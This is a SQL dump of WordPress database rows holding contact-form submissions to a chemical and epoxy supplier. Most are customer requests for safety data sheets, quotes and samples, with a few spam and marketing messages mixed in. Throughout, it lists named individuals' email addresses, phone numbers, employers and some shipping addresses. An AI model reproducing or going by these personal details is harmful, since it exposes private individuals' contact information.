INSERT INTO `wp_postmeta` VALUES (34390, 3853, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34391, 3853, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34392, 3853, '_field_1', 'Bryan Curry'); 
INSERT INTO `wp_postmeta` VALUES (34393, 3853, '_field_10', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (34394, 3853, '_field_2', 'bryan.curry@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (34395, 3853, '_field_8', '(650) 354-5411'); 
INSERT INTO `wp_postmeta` VALUES (34396, 3853, '_field_3', 'I did not fine MS-180/CO2 in your SDS list. Could you send me the latest revision?'); 
INSERT INTO `wp_postmeta` VALUES (34397, 3853, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34398, 3853, '_sub_id', '3853'); 
INSERT INTO `wp_postmeta` VALUES (34399, 3854, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34400, 3854, '_seq_num', '434'); 
INSERT INTO `wp_postmeta` VALUES (34401, 3854, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34402, 3854, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34403, 3854, '_field_1', 'BrosoaLZ'); 
INSERT INTO `wp_postmeta` VALUES (34404, 3854, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (34405, 3854, '_field_2', 'koltso.vsevlastia@yandex.com'); 
INSERT INTO `wp_postmeta` VALUES (34406, 3854, '_field_8', '85677459976'); 
INSERT INTO `wp_postmeta` VALUES (34407, 3854, '_field_3', 'Tim McGraw is a famous country singer, so don&#039;t miss the possibility to visit &lt;a href=&quot;http://timmcgrawtourtickets.com/&quot; /&gt;Tim McGraw 2017 tour&lt;/a&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34408, 3854, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34409, 3854, '_sub_id', '3854'); 
INSERT INTO `wp_postmeta` VALUES (34410, 3855, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34411, 3855, '_seq_num', '435'); 
INSERT INTO `wp_postmeta` VALUES (34412, 3855, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34413, 3855, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34414, 3855, '_field_1', 'Jon Loughmiller'); 
INSERT INTO `wp_postmeta` VALUES (34415, 3855, '_field_10', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (34416, 3855, '_field_2', 'jon.k.loughmiller@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (34417, 3855, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34418, 3855, '_field_3', 'I could not find a Safety Data Sheet on your website for MS-180/CO2.  Has the MS-180 line been discontinued?'); 
INSERT INTO `wp_postmeta` VALUES (34419, 3855, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34420, 3855, '_sub_id', '3855'); 
INSERT INTO `wp_postmeta` VALUES (34421, 3856, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34422, 3856, '_seq_num', '436'); 
INSERT INTO `wp_postmeta` VALUES (34423, 3856, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34424, 3856, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34425, 3856, '_field_1', 'Tyler Kaufman'); 
INSERT INTO `wp_postmeta` VALUES (34426, 3856, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34427, 3856, '_field_2', 'kaufmt@rpi.edu'); 
INSERT INTO `wp_postmeta` VALUES (34428, 3856, '_field_8', '(978) 210-8027'); 
INSERT INTO `wp_postmeta` VALUES (34429, 3856, '_field_3', 'Hello,\r\nMy name is Tyler Kaufman and I am a student at RPI. I have a research idea I am conducting with a professor and I was wondering if it would be possible to obtain samples of some of your epoxy resins. I am using them to create a metal ceramic that has the highest tensile stress possible. The reason I ask for samples is so that I know which epoxy works best before I were to buy in bulk. For each sample, only 100 mL would be needed of resin and the appropriate amount of hardener with that. \r\nThank you,\r\nTyler Kaufman'); 
INSERT INTO `wp_postmeta` VALUES (34430, 3856, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34431, 3856, '_sub_id', '3856'); 
INSERT INTO `wp_postmeta` VALUES (34432, 3857, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34433, 3857, '_seq_num', '437'); 
INSERT INTO `wp_postmeta` VALUES (34434, 3857, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34435, 3857, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34436, 3857, '_field_1', 'Jessica Pence'); 
INSERT INTO `wp_postmeta` VALUES (34437, 3857, '_field_10', 'Synovos'); 
INSERT INTO `wp_postmeta` VALUES (34438, 3857, '_field_2', 'jpence@synovos.com'); 
INSERT INTO `wp_postmeta` VALUES (34439, 3857, '_field_8', '(269) 833-0551'); 
INSERT INTO `wp_postmeta` VALUES (34440, 3857, '_field_3', 'Hello,\n\nWe received in a PO for 48 cans of MS-260 Cleaner for Plastic, Glass &amp; Metal.  Lot: 6208.  PO: BR-KAL-188350AA.  This item requires a COA in order to receive into inventory.  Would you be able to provide one for me please?'); 
INSERT INTO `wp_postmeta` VALUES (34441, 3857, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34442, 3857, '_sub_id', '3857'); 
INSERT INTO `wp_postmeta` VALUES (34443, 3858, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34444, 3858, '_seq_num', '438'); 
INSERT INTO `wp_postmeta` VALUES (34445, 3858, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34446, 3858, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34447, 3858, '_field_1', 'otto burgess'); 
INSERT INTO `wp_postmeta` VALUES (34448, 3858, '_field_10', 'atpco'); 
INSERT INTO `wp_postmeta` VALUES (34449, 3858, '_field_2', 'otto.burgess@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34450, 3858, '_field_8', '(937) 609-4784'); 
INSERT INTO `wp_postmeta` VALUES (34451, 3858, '_field_3', 'i am in need of 1 liter of krytox gpl106 or gpl107 for use in a high temperature hydraulic brake system. please add anti-corrosive additive. can you tell me the cost (include shipping to zip 20170). thanks!'); 
INSERT INTO `wp_postmeta` VALUES (34452, 3858, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34453, 3858, '_sub_id', '3858'); 
INSERT INTO `wp_postmeta` VALUES (34454, 3859, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34455, 3859, '_seq_num', '251'); 
INSERT INTO `wp_postmeta` VALUES (34456, 3859, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34457, 3859, '_field_12', 'Laszlo gal'); 
INSERT INTO `wp_postmeta` VALUES (34458, 3859, '_field_13', 'Xylem Service Hungary Kft.'); 
INSERT INTO `wp_postmeta` VALUES (34459, 3859, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34460, 3859, '_field_14', 'laszlo.gal@xyleminc.com'); 
INSERT INTO `wp_postmeta` VALUES (34461, 3859, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34462, 3859, '_field_16', 'Dear Technical Support Team,\n\nOur colleagues at Xylem Water Solutions Australia (Brisbane) would like to apply a thin layer of Krytox GPL205 grease (which is currently in use at other applications) on a surface of plastic enclosure (raw material: Emerge PC 8230). Can you please check the chemical compatibility of this grease with the PC plastic? \nThis topic is really urgent so your prompt feedback is highly appreciated!\nBest Regards,\nLaszlo'); 
INSERT INTO `wp_postmeta` VALUES (34463, 3859, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34464, 3859, '_sub_id', '3859'); 
INSERT INTO `wp_postmeta` VALUES (34465, 3860, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34466, 3860, '_seq_num', '439'); 
INSERT INTO `wp_postmeta` VALUES (34467, 3860, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34468, 3860, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34469, 3860, '_field_1', 'Carl Berry'); 
INSERT INTO `wp_postmeta` VALUES (34470, 3860, '_field_10', 'carls garage'); 
INSERT INTO `wp_postmeta` VALUES (34471, 3860, '_field_2', 'branbran1989@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34472, 3860, '_field_8', '(334) 401-9291'); 
INSERT INTO `wp_postmeta` VALUES (34473, 3860, '_field_3', 'I like to know do you have a wholesale price list.I like to try your product please send to\r\nCarl&#039;s Garage \r\n295 County Road 83\r\nNotasulga Al 36866\r\n334-401-9291'); 
INSERT INTO `wp_postmeta` VALUES (34474, 3860, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34475, 3860, '_sub_id', '3860'); 
INSERT INTO `wp_postmeta` VALUES (34476, 3861, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34477, 3861, '_seq_num', '252'); 
INSERT INTO `wp_postmeta` VALUES (34478, 3861, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34479, 3861, '_field_12', 'Felipe de Almeida Britto Silva '); 
INSERT INTO `wp_postmeta` VALUES (34480, 3861, '_field_13', 'CSN '); 
INSERT INTO `wp_postmeta` VALUES (34481, 3861, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34482, 3861, '_field_14', 'felipe.britto@csn.com.br'); 
INSERT INTO `wp_postmeta` VALUES (34483, 3861, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34484, 3861, '_field_16', 'Good morning!\r\n\r\nI work at CSN Brazil, we need the catalog of materials to purchase the MS-122AD product below:\r\n\r\nhttps://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/\r\n\r\nThank you!\r\n\r\nAt.te\r\n\r\nFelipe de Almeida Britto Silva\r\nTécnico de Desenvolvimento\r\nCSN - Companhia Siderúrgica Nacional\r\nfelipe.britto@csn.com.br\r\n55 (24) 3344-4736/4084\r\nwww.csn.com.br\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34485, 3861, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34486, 3861, '_sub_id', '3861'); 
INSERT INTO `wp_postmeta` VALUES (34487, 3862, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34488, 3862, '_seq_num', '253'); 
INSERT INTO `wp_postmeta` VALUES (34489, 3862, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34490, 3862, '_field_12', 'Simon Maura-Cooper'); 
INSERT INTO `wp_postmeta` VALUES (34491, 3862, '_field_13', 'Kearsley Airways Limited'); 
INSERT INTO `wp_postmeta` VALUES (34492, 3862, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34493, 3862, '_field_14', 'simon.maura-cooper@kalair.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (34494, 3862, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34495, 3862, '_field_16', 'We have been advised by one of our Suppliers that BASF Versamid 125 Medium Viscosity Reactive Polamide Resin is no longer available. \nPlease could you advise me of an alternate product that meets the same specifications as this product. \nMany thanks. Simon'); 
INSERT INTO `wp_postmeta` VALUES (34496, 3862, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34497, 3862, '_sub_id', '3862'); 
INSERT INTO `wp_postmeta` VALUES (34498, 3863, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34499, 3863, '_seq_num', '440'); 
INSERT INTO `wp_postmeta` VALUES (34500, 3863, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34501, 3863, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34502, 3863, '_field_1', 'Alex Pietruszewski'); 
INSERT INTO `wp_postmeta` VALUES (34503, 3863, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34504, 3863, '_field_2', 'alex.pietruszewski@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34505, 3863, '_field_8', '(860) 990-1411'); 
INSERT INTO `wp_postmeta` VALUES (34506, 3863, '_field_3', 'I am currently a chemical engineering student at the University of Connecticut. I will be graduating in May of 2017 and would like to know if there are any career opportunities at Miller-Stephenson that might be a good fit for me. '); 
INSERT INTO `wp_postmeta` VALUES (34507, 3863, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34508, 3863, '_sub_id', '3863'); 
INSERT INTO `wp_postmeta` VALUES (34509, 3864, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34510, 3864, '_seq_num', '254'); 
INSERT INTO `wp_postmeta` VALUES (34511, 3864, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34512, 3864, '_field_12', 'Erin Shields'); 
INSERT INTO `wp_postmeta` VALUES (34513, 3864, '_field_13', 'Dow Chemical'); 
INSERT INTO `wp_postmeta` VALUES (34514, 3864, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34515, 3864, '_field_14', 'eshields@dow.com'); 
INSERT INTO `wp_postmeta` VALUES (34516, 3864, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34517, 3864, '_field_16', 'I would like to request a current USA SDS for the following product, as I was unable to locate it on the website:\n\nCO2 SAFEZONE SOLVENT FLUX REMOVER\nPart#: MS 990\nMSDS#: 184685\n'); 
INSERT INTO `wp_postmeta` VALUES (34518, 3864, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34519, 3864, '_sub_id', '3864'); 
INSERT INTO `wp_postmeta` VALUES (34520, 3865, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34521, 3865, '_seq_num', '441'); 
INSERT INTO `wp_postmeta` VALUES (34522, 3865, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34523, 3865, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34524, 3865, '_field_1', 'zorba shon'); 
INSERT INTO `wp_postmeta` VALUES (34525, 3865, '_field_10', 'kencoa aerospace'); 
INSERT INTO `wp_postmeta` VALUES (34526, 3865, '_field_2', 'mkshon@kencoa.com'); 
INSERT INTO `wp_postmeta` VALUES (34527, 3865, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34528, 3865, '_field_3', 'i would like a request for information.\nMold Releaser/PWA36007-2,MS-122XD 1CN=14oz'); 
INSERT INTO `wp_postmeta` VALUES (34529, 3865, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34530, 3865, '_sub_id', '3865'); 
INSERT INTO `wp_postmeta` VALUES (34531, 3866, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34532, 3866, '_seq_num', '442'); 
INSERT INTO `wp_postmeta` VALUES (34533, 3866, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34534, 3866, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34535, 3866, '_field_1', 'Melanie Kühn'); 
INSERT INTO `wp_postmeta` VALUES (34536, 3866, '_field_10', 'Leibniz Institute of Polymer Research Dresden'); 
INSERT INTO `wp_postmeta` VALUES (34537, 3866, '_field_2', 'kuehn@ipfdd.de'); 
INSERT INTO `wp_postmeta` VALUES (34538, 3866, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34539, 3866, '_field_3', 'Dear Sir/Madam,\r\n\r\nCan you make me a price quote for Krytox 157 FSH Oil, 5kg Handle jug, please?'); 
INSERT INTO `wp_postmeta` VALUES (34540, 3866, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34541, 3866, '_sub_id', '3866'); 
INSERT INTO `wp_postmeta` VALUES (34542, 3867, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34543, 3867, '_seq_num', '443'); 
INSERT INTO `wp_postmeta` VALUES (34544, 3867, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34545, 3867, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34546, 3867, '_field_1', 'Chris Degeyter'); 
INSERT INTO `wp_postmeta` VALUES (34547, 3867, '_field_10', 'Husco International'); 
INSERT INTO `wp_postmeta` VALUES (34548, 3867, '_field_2', 'Christopher.degeyter@husco.com'); 
INSERT INTO `wp_postmeta` VALUES (34549, 3867, '_field_8', '(262) 513-4277'); 
INSERT INTO `wp_postmeta` VALUES (34550, 3867, '_field_3', 'Hello, I&#039;m looking for SDSs for the following products:\r\n\r\nMS-450 Protective Varnish\r\nMS-350 En-Rust\r\n\r\nAny information would be appreciated.'); 
INSERT INTO `wp_postmeta` VALUES (34551, 3867, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34552, 3867, '_sub_id', '3867'); 
INSERT INTO `wp_postmeta` VALUES (34554, 3868, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34555, 3868, '_seq_num', '444'); 
INSERT INTO `wp_postmeta` VALUES (34556, 3868, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34557, 3868, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34558, 3868, '_field_1', 'gabriela mironescu'); 
INSERT INTO `wp_postmeta` VALUES (34559, 3868, '_field_10', 'MED TECHNOLOGY SRL'); 
INSERT INTO `wp_postmeta` VALUES (34560, 3868, '_field_2', 'gabriela.mironescu@medtechnology.it'); 
INSERT INTO `wp_postmeta` VALUES (34561, 3868, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34562, 3868, '_field_3', 'Dear MS Team,\r\nplease send us your quality ISO certification\r\nThank you \r\nBest regards,\r\nGabriela '); 
INSERT INTO `wp_postmeta` VALUES (34563, 3868, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34564, 3868, '_sub_id', '3868'); 
INSERT INTO `wp_postmeta` VALUES (34565, 3869, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34566, 3869, '_seq_num', '445'); 
INSERT INTO `wp_postmeta` VALUES (34567, 3869, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34568, 3869, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34569, 3869, '_field_1', 'Stephen Wells'); 
INSERT INTO `wp_postmeta` VALUES (34570, 3869, '_field_10', 'Liquids Research Limited'); 
INSERT INTO `wp_postmeta` VALUES (34571, 3869, '_field_2', 'stephen@liquidsresearch.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (34572, 3869, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34573, 3869, '_field_3', 'I am enquiring if you have any stocks of krytox 157(M) available\r\n\r\nBest Regards,\r\nDr. S. Wells'); 
INSERT INTO `wp_postmeta` VALUES (34574, 3869, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34575, 3869, '_sub_id', '3869'); 
INSERT INTO `wp_postmeta` VALUES (34576, 3870, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34577, 3870, '_seq_num', '446'); 
INSERT INTO `wp_postmeta` VALUES (34578, 3870, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34579, 3870, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34580, 3870, '_field_1', 'Tracy Pitts'); 
INSERT INTO `wp_postmeta` VALUES (34581, 3870, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (34582, 3870, '_field_2', 'tracypitts.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34583, 3870, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (34584, 3870, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\n\r\nBest,\r\n\r\nTracy Pitts\r\nDigital Marketing Manager\r\n(877)-228-1545 \r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (34585, 3870, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34586, 3870, '_sub_id', '3870'); 
INSERT INTO `wp_postmeta` VALUES (34587, 3872, '_wp_attached_file', '2017/03/143XD-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (34588, 3874, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34589, 3874, '_seq_num', '447'); 
INSERT INTO `wp_postmeta` VALUES (34590, 3874, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34591, 3874, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34592, 3874, '_field_1', 'Michelle'); 
INSERT INTO `wp_postmeta` VALUES (34593, 3874, '_field_10', 'Dow'); 
INSERT INTO `wp_postmeta` VALUES (34594, 3874, '_field_2', 'mriener@dow.com'); 
INSERT INTO `wp_postmeta` VALUES (34595, 3874, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34596, 3874, '_field_3', 'Hi,\nWhat is the 1 hour half-life of V-52? Thank you'); 
INSERT INTO `wp_postmeta` VALUES (34597, 3874, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34598, 3874, '_sub_id', '3874'); 
INSERT INTO `wp_postmeta` VALUES (34599, 3875, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34600, 3875, '_seq_num', '448'); 
INSERT INTO `wp_postmeta` VALUES (34601, 3875, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34602, 3875, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34603, 3875, '_field_1', 'Dr. Anthony P. Shaw'); 
INSERT INTO `wp_postmeta` VALUES (34604, 3875, '_field_10', 'U.S. Army RDECOM-ARDEC'); 
INSERT INTO `wp_postmeta` VALUES (34605, 3875, '_field_2', 'anthony.p.shaw.civ@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (34606, 3875, '_field_8', '(973) 724-1386'); 
INSERT INTO `wp_postmeta` VALUES (34607, 3875, '_field_3', 'Hello,\r\n\r\nI would like to request a sample of the epoxy resin EPON 828.\r\n\r\nShipping Address:\r\n\r\nDr. Anthony P. Shaw\r\nHAZMART, Bldg 316\r\nPicatinny Arsenal, NJ 07806\r\n\r\nThanks very much. We will be evaluating the product for new energetic materials applications.\r\n\r\nAnthony P. Shaw, Ph.D.\r\nChemist, Pyrotechnics Technology Division,\r\nU.S. Army RDECOM-ARDEC,\r\nPicatinny Arsenal, NJ 07806, USA'); 
INSERT INTO `wp_postmeta` VALUES (34608, 3875, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34609, 3875, '_sub_id', '3875'); 
INSERT INTO `wp_postmeta` VALUES (34610, 3876, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34611, 3876, '_seq_num', '449'); 
INSERT INTO `wp_postmeta` VALUES (34612, 3876, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34613, 3876, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34614, 3876, '_field_1', 'Alan '); 
INSERT INTO `wp_postmeta` VALUES (34615, 3876, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34616, 3876, '_field_2', 'oddjobs2go@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34617, 3876, '_field_8', '(941) 662-5504'); 
INSERT INTO `wp_postmeta` VALUES (34618, 3876, '_field_3', 'Looking for a high temperature Grease for a 1930s motorcycle which has a grease nipple for the exhaust valve guide.'); 
INSERT INTO `wp_postmeta` VALUES (34619, 3876, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34620, 3876, '_sub_id', '3876'); 
INSERT INTO `wp_postmeta` VALUES (34621, 3877, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34622, 3877, '_seq_num', '450'); 
INSERT INTO `wp_postmeta` VALUES (34623, 3877, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34624, 3877, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34625, 3877, '_field_1', 'Neema Rawat'); 
INSERT INTO `wp_postmeta` VALUES (34626, 3877, '_field_10', 'Graphene Laboratories Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34627, 3877, '_field_2', 'neema.rawat@graphenelab.com'); 
INSERT INTO `wp_postmeta` VALUES (34628, 3877, '_field_8', '(631) 284-9983'); 
INSERT INTO `wp_postmeta` VALUES (34629, 3877, '_field_3', 'Hi,\r\n\r\nI would like to get a quote for the following items in 1 Quart and 1 Gallon sizes\r\nEpikure 3046\r\nEpikure 3253\r\nEpikure 3370\r\nEpon 58034\r\nEpikure 3140\r\n\r\nThank you,\r\nNeema Rawat'); 
INSERT INTO `wp_postmeta` VALUES (34630, 3877, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34631, 3877, '_sub_id', '3877'); 
INSERT INTO `wp_postmeta` VALUES (34632, 3878, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34633, 3878, '_seq_num', '451'); 
INSERT INTO `wp_postmeta` VALUES (34634, 3878, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34635, 3878, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34636, 3878, '_field_1', 'Dhananjay Kumar'); 
INSERT INTO `wp_postmeta` VALUES (34637, 3878, '_field_10', 'Dhananjay'); 
INSERT INTO `wp_postmeta` VALUES (34638, 3878, '_field_2', 'dk656636@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34639, 3878, '_field_8', '(919) 891-5389'); 
INSERT INTO `wp_postmeta` VALUES (34640, 3878, '_field_3', 'How to Improve your Website&#039;s Ranking on Google&#039;s Search Engine Results.\r\n\r\nHi,\r\nI am Dhananjay Kumar, (Business Development Manager,)\r\n\r\nWe are an Indian Web Design and Development firm with over 8 years of experience. In these tough times, where it is hard to maintain the top line, we can help share the bottom-line for you.\r\n\r\nWe are primary focus on:\r\n\r\n1.	SEO, PPC, SMO, Digital Marketing &amp; Etc.\r\n2.	Web &amp; Graphic Design\r\n3.	Responsive Website Design\r\n4.	Web Development and Customization\r\n\r\nDo let me know if you are interested and I would be happy to share our Methodologies, past work details and client testimonials.\r\nI look forward to your mail.\r\n\r\nKind Regards,\r\nDhananjay Kumar\r\n+91-989-153-8913\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34641, 3878, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34642, 3878, '_sub_id', '3878'); 
INSERT INTO `wp_postmeta` VALUES (34643, 3880, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34644, 3880, '_seq_num', '452'); 
INSERT INTO `wp_postmeta` VALUES (34645, 3880, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34646, 3880, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34647, 3880, '_field_1', 'DaviderureHR'); 
INSERT INTO `wp_postmeta` VALUES (34648, 3880, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (34649, 3880, '_field_2', 'davidvow@mail.ru'); 
INSERT INTO `wp_postmeta` VALUES (34650, 3880, '_field_8', '84342295987'); 
